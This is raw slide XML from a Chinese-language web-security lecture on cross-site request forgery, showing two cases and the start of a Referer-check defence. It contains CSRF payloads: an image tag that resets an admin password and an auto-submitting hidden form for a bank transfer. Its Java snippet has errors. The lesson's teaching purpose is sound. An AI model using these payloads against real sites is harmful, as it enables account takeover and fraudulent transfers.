              </a:rPr>
              <a:t>案</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>例</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56323" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="701675" y="1143000"/>
            <a:ext cx="8156575" cy="514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pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>案例</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Times" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>站点上的代码</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Times" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>站点代码：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="180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180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180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1800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>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Char char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>恶意站点上的代码</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800">
              <a:solidFill>
                <a:schemeClr val="tx1"/>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1800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>&lt;img src=http://siteA/updateuser.jsp?user=admin&amp;pass=123456&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4" name="表格 3"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="785813" y="2286000"/>
          <a:ext cx="8072437" cy="2042054"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="8072437"/>
              </a:tblGrid>
              <a:tr h="2041525">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr eaLnBrk="1" hangingPunct="1">
                        <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>String user = </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>request.getParameter</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>(“user”);</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr eaLnBrk="1" hangingPunct="1">
                        <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>String pass = </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>request.getParameter</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>(“pass”);</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr eaLnBrk="1" hangingPunct="1">
                        <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>PreparedStatement</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>ps</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t> = </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>con.prepareStatement</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>(“update </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>UserTB</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t> set password=?  Where user=?”);</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr eaLnBrk="1" hangingPunct="1">
                        <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>ps.setString</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>(1,user);</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr eaLnBrk="1" hangingPunct="1">
                        <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>ps.setString</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>(2,pass);</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr eaLnBrk="1" hangingPunct="1">
                        <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>con.executeUpdate</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>();</a:t>
                      </a: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600" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91439" marR="91439" marT="45667" marB="45667">
                    <a:solidFill>
                      <a:schemeClr val="bg1">
                        <a:lumMod val="85000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>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617538" y="92075"/>
            <a:ext cx="6030912" cy="561975"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Times" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>案</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>例</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57347" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="714375" y="1357313"/>
            <a:ext cx="7858125"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pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>案例</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:latin typeface="Times" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="Times" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
              <a:latin typeface="Times" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>【代码示例】</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>例如，一个银行篡改用户转账路径是通过如下方式实现的：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
              <a:latin typeface="Times" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="表格 4"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1043608" y="2831138"/>
          <a:ext cx="6192688" cy="2110030"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="6192688"/>
              </a:tblGrid>
              <a:tr h="2110030">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="x-none" altLang="zh-CN" sz="1800" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>POST http://bank.com/transfer/payment?</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&lt;form action=http://localhost/myx/admin.jsp/acate/trans method=POST&gt;</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&lt;input type="text" name="id" value="102" /&gt;</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    &lt;input type="text" name="trans" value="20123012310" /&gt;</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&lt;/form&gt;</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1800" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="x-none" altLang="zh-CN" sz="1800" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>&lt;script&gt; document.forms[0].submit(); &lt;/script&gt;</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="0" marB="0"/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>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428625" y="928688"/>
            <a:ext cx="8572500" cy="5884862"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC3300"/>
              </a:buClr>
              <a:buSzPct val="85000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="n"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="990000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>解决方案</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="990000"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:cs typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>检查</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> HTTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>头部</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Refer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>信息</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>   Server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>端在收到请求之后，可以去检查这个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>头信息</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>，只接受来自</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>本域</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>的请求而忽略</a:t>
            </a:r>
            <a:r>
